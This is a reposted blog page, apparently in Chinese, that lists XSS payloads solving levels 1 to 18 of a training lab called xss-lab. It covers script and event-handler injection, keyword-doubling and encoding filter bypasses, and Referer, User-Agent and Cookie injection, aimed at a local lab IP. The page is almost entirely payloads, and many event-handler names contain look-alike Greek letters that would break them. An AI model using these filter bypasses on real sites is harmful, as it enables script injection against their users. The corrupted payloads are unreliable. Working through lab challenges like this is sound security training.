xss-lab 1-18關payload

Less-1

?name=<script>alert()</script>

Less-2

"><script>alert()</script>
"οnclick="alert()
" οnfοcus="alert()
" οnblur="alert()

Less-3

' οnfοcus='alert()
' οnblur='alert()
' οnfοcus='javascript:alert()'
' οnblur='javascript:alert()
' οnclick='alert()

Less-4

" οnfοcus="alert()
" οnfοcus="javascript:alert()
" οnblur="alert()
" οnblur="javascript:alert()
" οnclick="alert()
" οnclick="javascript:alert()

Less-5

"><a href="javascript:alert();">cooper</a>

Less-6

" Onclick="alert()
" Onfocus="alert()
" Onblur = "alert()
"><a Href="javascript:alert()">cooper</a>
"><Script>alert()</Script>

Less-7

" oonnfocus="alert()
"oonnclick="alert()
" oonnfocus="alert()
"><a hhrefref="javasscriptcript:alert()">cooper</a>
"><sscriptcript>alert()</sscriptcript>

"><img ssrcrc=666 oonnerror=alert()>
"><img srsrcc=666 oonnmouseout=alert()>
"><img srsrcc=666 oonnmouseover=alert()>

Less-8

javascript:alert() ? （使用Unicode編碼）
javascript:alert()

Less-9

javascript:alert() ? ?編碼后加http://，注釋使用//或/**/
javascript:alert()//http://
javascript:alert()/*http://*/

Less-10

?t_sort=" οnfοcus=javascript:alert(); type="text?? ?type（加窗口）
?t_sort=" οnclick=javascript:alert(); type="
?t_sort=" οnblur=javascript:alert(); type="

?keyword=well done!&t_lick=aa&t_history=aa&t_sort=aa?? ?查看哪里可以賦值
?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnclick='alert(123)'?
?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnblur='javascript:alert()'
?keyword=well done!&t_lick=aa&t_history=aa&t_sort='" type='text' οnfοcus='alert(123)'?

Less-11

使用burpsuite抓包
在Referer處改為Less-10的payload，放行即可
Referer:" οnfοcus=javascript:alert(); type="text

Less-12

使用burpsuite抓包
在UA處改為Less-10的payload，放行即可
User-Agent: " οnfοcus=javascript:alert(); type="text

Less-13

使用burpsuite抓包
在cookie處改為Less-10的payload，放行即可
Cookie: user=" οnfοcus=javascript:alert() type="text

Less-14

網頁失效，上傳圖片屬性中含有js代碼，詳見博客

Less-15

http://192.168.31.110/xss/level15.php?src=' http://192.168.31.110/xss/level1.php?name="><a href="javascript:alert( )">cooper</a>'

Less-16

http://192.168.31.110/xss/level16.php?keyword=%3Ca%0Ahref=%27javasc%0Aript:alert()%27%3Ecooper

Less-17

http://192.168.31.110/xss/level17.php?arg01=a&arg02=b%20οnmοuseοver=javascript:alert()
http://192.168.31.110/xss/level17.php?arg01=a&arg02=b%20οnmοuseοut=javascript:alert()
（在edge上打開，火狐沒有彈窗）

Less-18

http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοuseοver=alert()
http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοuseοut=alert()
http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοuseleave=alert()
http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοuseenter=alert()
http://192.168.31.110/xss/level18.php?arg01=a&arg02=b%20οnmοusedοwn=alert()? ? （點擊觸發）

onmouseover、onmouseout：鼠標移動到自身時候會觸發事件，同時移動到其子元素身上也會觸發事件
onmouseenter、onmouseleave：鼠標移動到自身是會觸發事件，但是移動到其子元素身上不會觸發事件

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/web/10657.shtml
繁體地址，請注明出處：http://hk.pswp.cn/web/10657.shtml
英文地址，請注明出處：http://en.pswp.cn/web/10657.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！